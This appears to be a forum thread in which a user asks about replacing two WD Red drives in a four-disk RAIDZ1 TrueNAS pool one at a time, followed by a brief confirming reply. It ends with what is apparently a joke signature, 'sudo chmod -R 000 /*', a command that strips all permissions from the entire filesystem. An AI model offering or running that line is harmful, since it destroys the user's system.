i have a Truenas server running... now i don´t have critical data on it, so running a 4 disk ZFS of 4x8 TB´s in the normal 1 disk redundency ZFS..

now the problem is, that it is created with 2 x N300 (7200rpm) 8TB and 2x WD Red (5400) drives, did not really care that much about performance at the time... i now have 2 extra Seagate 7200rpm EXOS that is more on par with the N300 drives..

can i just OFFLINE 1 WD RED, then exchange it with a EXOS, then let it resilver, then when done, offline the other WD RED and do the same, to get 4x250MB/sec discs, in the raid... i know it seems slow, but i don´t really have anywhere to offload the data...

Yes, that should work.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
